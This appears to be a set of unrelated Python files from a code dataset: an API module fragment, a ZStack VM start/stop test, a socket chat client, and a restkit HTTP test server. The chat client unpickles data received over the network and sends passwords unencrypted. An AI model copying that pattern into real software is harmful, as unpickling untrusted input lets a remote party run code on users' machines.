ELAN_SUBNETS = generate_subnets('10.20', 0, subnet_size=50, mask=24)
# 10.30.xxx.0/30
global ELINE_SUBNETS
ELINE_SUBNETS = generate_subnets('10.30', 0, subnet_size=50, mask=30)
if __name__ == '__main__':
"""
Lets allow to run the API in standalone mode.
"""
GK_STANDALONE_MODE = True
logging.getLogger("werkzeug").setLevel(logging.INFO)
start_rest_api("0.0.0.0", 8000)
|
test_start_vms_simultaneously.py
|
'''
Test stop 4 vms, then start them simultaneously
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import threading
import time
import apibinding.inventory as inventory
import sys
import os
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_name = os.environ.get('l3VlanDNATNetworkName')
vm1 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm1)
vm2 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm2)
vm3 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm3)
vm4 = test_stub.create_vlan_vm(l3_name=l3_name)
test_obj_dict.add_vm(vm4)
vms = [vm1, vm2, vm3, vm4]
for vm in vms:
thread = threading.Thread(target=vm_ops.stop_vm, args=(vm.get_vm().uuid, None, session_uuid,))
thread.start()
while threading.activeCount() > 1:
time.sleep(0.1)
for vm in vms:
thread = threading.Thread(target=vm_ops.start_vm, args=(vm.get_vm().uuid, session_uuid,))
thread.start()
vm1.check()
vm2.check()
vm3.check()
vm4.check()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
time.sleep(0.1)
test_lib.lib_robot_cleanup(test_obj_dict)
test_util.test_pass('Test start VRs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
test_lib.lib_error_cleanup(test_obj_dict)
|
client.py
|
import pickle
import time
import socket
import threading
import tkinter
import sys
import os
def cls():
os.system('cls' if os.name=='nt' else 'clear')
class Message:
def __init__(self,author,content,date):
self.author = author
self.content = content
self.date = date
class User:
def __init__(self,uuid,username,password):
self.username = username
self.password = password
class Chat:
def receivemessages(self):
while True:
# Waits for incoming messages
incomingmessage = cs.recv(4048)
# Loads new message into memory
newmessage = pickle.loads(incomingmessage)
# Adds message to local message list (this is redundant for now)
localmessages.append(newmessage)
# Prints out message author and content
cls()
for message in localmessages:
sys.stdout.write(message.author + ": " + message.content + "\n")
def sendmessages(self):
while True:
messagecontent = input()
outgoing = Message(name,messagecontent,time.time())
picklepayload = pickle.dumps(outgoing)
cs.send(picklepayload)
ip = input("Enter server IP: ")
port = 5556
errors = {
"loginfail" : "Login failed!",
"nametaken" : "That username has been taken."
}
# Loop for attempting connection to server
while True:
if ip == "":
ip = socket.gethostname()
request_new_account = input("New account? (y/n): ")
if request_new_account == "y":
new_account = True
else:
new_account = False
attempt_username = input("Enter your username: ")
attempt_password = input("Enter your password: ")
try:
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cs.connect((ip, port))
except:
print("Could not connect to server!")
cs.send(pickle.dumps((new_account,attempt_username,attempt_password)))
# Waits for server to either give a login error or not
response = pickle.loads(cs.recv(1024))
# Checks the error
if response == "loginfail" or response == "nametaken":
# Prints a friendly error description to user
print(errors[response])
# Starts the connection attempt from the behinning if an error is sent
continue
# Announces connection
print("Connected to " + ip)
# Waits for message history list
picklepayload = cs.recv(1024)
# Loads chat message history into memory
localmessages = pickle.loads(picklepayload)
break
print("SUP!")
chat = Chat()
# Prints out the messages in the message history
#for message in localmessages:
#sys.stdout.write(message.author + ": " + message.content + "\n")
sendthread = threading.Thread(target = chat.sendmessages)
receivethread = threading.Thread(target = chat.receivemessages)
receivethread.start()
sendthread.start()
|
_server_test.py
|
# -*- coding: utf-8 -
#
# Copyright (c) 2008 (c) Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import base64
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import socket
import tempfile
import threading
import unittest
import urlparse
try:
from urlparse import parse_qsl, parse_qs
except ImportError:
from cgi import parse_qsl, parse_qs
import urllib
from restkit.util import to_bytestring
HOST = 'localhost'
PORT = (os.getpid() % 31000) + 1024
class HTTPTestHandler(BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.auth = 'Basic ' + base64.encodestring('test:test')[:-1]
self.count = 0
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
self.parsed_uri = urlparse.urlparse(urllib.unquote(self.path))
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
if path == "/":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "welcome")
elif path == "/unicode":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, u"éàù@")
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type")
else:
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/éàù":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/test":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/qint":
test = self.query.get("test", False)
if test and test == "1":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/auth":
extra_headers = [('Content-type', 'text/plain')]
if not 'Authorization' in self.headers:
realm = "test"
extra_headers.append(('WWW-Authenticate', 'Basic realm="%s"' % realm))
self._respond(401, extra_headers, "")
else:
auth = self.headers['Authorization'][len('Basic')+1:]
auth = base64.b64decode(auth).split(':')
if auth[0] == "test" and auth[1] == "test":
self._respond(200, extra_headers, "ok")
else:
self._respond(403, extra_headers, "niet!")
elif path == "/redirect":
extra_headers = [('Content-type', 'text/plain'),
('Location', '/complete_redirect')]
self._respond(301, extra_headers, "")
elif path == "/complete_redirect":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
elif path == "/redirect_to_url":
extra_headers = [('Content-type', 'text/plain'),
('Location', 'http://localhost:%s/complete_redirect' % PORT)]
self._respond(301, extra_headers, "")
elif path == "/pool":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self._respond(404,
[('Content-type', 'text/plain')], "Not Found" )
def do_POST(self):
self.parsed_uri = urlparse.urlparse(self.path)
self.query = {}
for k, v in parse_qsl(self.parsed_uri[4]):
self.query[k] = v.decode('utf-8')
path = self.parsed_uri[2]
extra_headers = []
if path == "/":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/bytestring":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/unicode":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', '-1'))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/json":
content_type = self.headers.get('content-type', 'text/plain')
if content_type != "application/json":
self.error_Response("bad type: %s" % content_type)
else:
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, body)
elif path == "/empty":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
if body == "":
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/query":
test = self.query.get("test", False)
if test and test == "testing":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/form":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
form = parse_qs(body)
if form['a'] == ["a"] and form["b"] == ["b"]:
self._respond(200, extra_headers, "ok")
else:
self.error_Response()
elif path == "/multipart":
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
content_length = int(self.headers.get('Content-length', 0))
if ctype == 'multipart/form-data':
req = cgi.parse_multipart(self.rfile, pdict)
body = req['t'][0]
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, body)
else:
self.error_Response()
elif path == "/1M":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
self._respond(200, extra_headers, str(len(body)))
elif path == "/large":
content_type = self.headers.get('content-type', 'text/plain')
extra_headers.append(('Content-Type', content_type))
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/list":
content_length = int(self.headers.get('Content-length', 0))
body = self.rfile.read(content_length)
extra_headers.append(('Content-Length', str(len(body))))
self._respond(200, extra_headers, body)
elif path == "/chunked":
te = (self.headers.get("transfer-encoding") == "chunked")
if te:
body = self.rfile.read(29)
extra_headers.append(('Content-Length', "29"))
self._respond(200, extra_headers, body)
else:
self.error_Response()
else:
self.error_Response('Bad path')
do_PUT = do_POST
def do_DELETE(self):
if self.path == "/delete":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def do_HEAD(self):
if self.path == "/ok":
extra_headers = [('Content-type', 'text/plain')]
self._respond(200, extra_headers, '')
else:
self.error_Response()
def error_Response(self, message=None):
req = [
('HTTP method', self.command),
('path', self.path),
]
if message:
req.append(('message', message))
body_parts = ['Bad request:\r\n']
for k, v in req:
body_parts.append(' %s: %s\r\n' % (k, v))
body = ''.join(body_parts)
self._respond(400, [('Content-type', 'text/plain'),
('Content-Length', str(len(body)))], body)
def _respond(self, http_code, extra_headers, body):
self.send_response(http_code)
keys = []
for k, v in extra_headers:
self.send_header(k, v)
keys.append(k)
if body:
body = to_bytestring(body)
#if body and "Content-Length" not in keys:
# self.send_header("Content-Length", len(body))
self.end_headers()
self.wfile.write(body)
self.wfile.close()
def finish(self):
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
self.rfile.close()
server_thread = None
def run_server_test():
global server_thread
if server_thread is not None:
return
server = HTTPServer((HOST, PORT), HTTPTestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.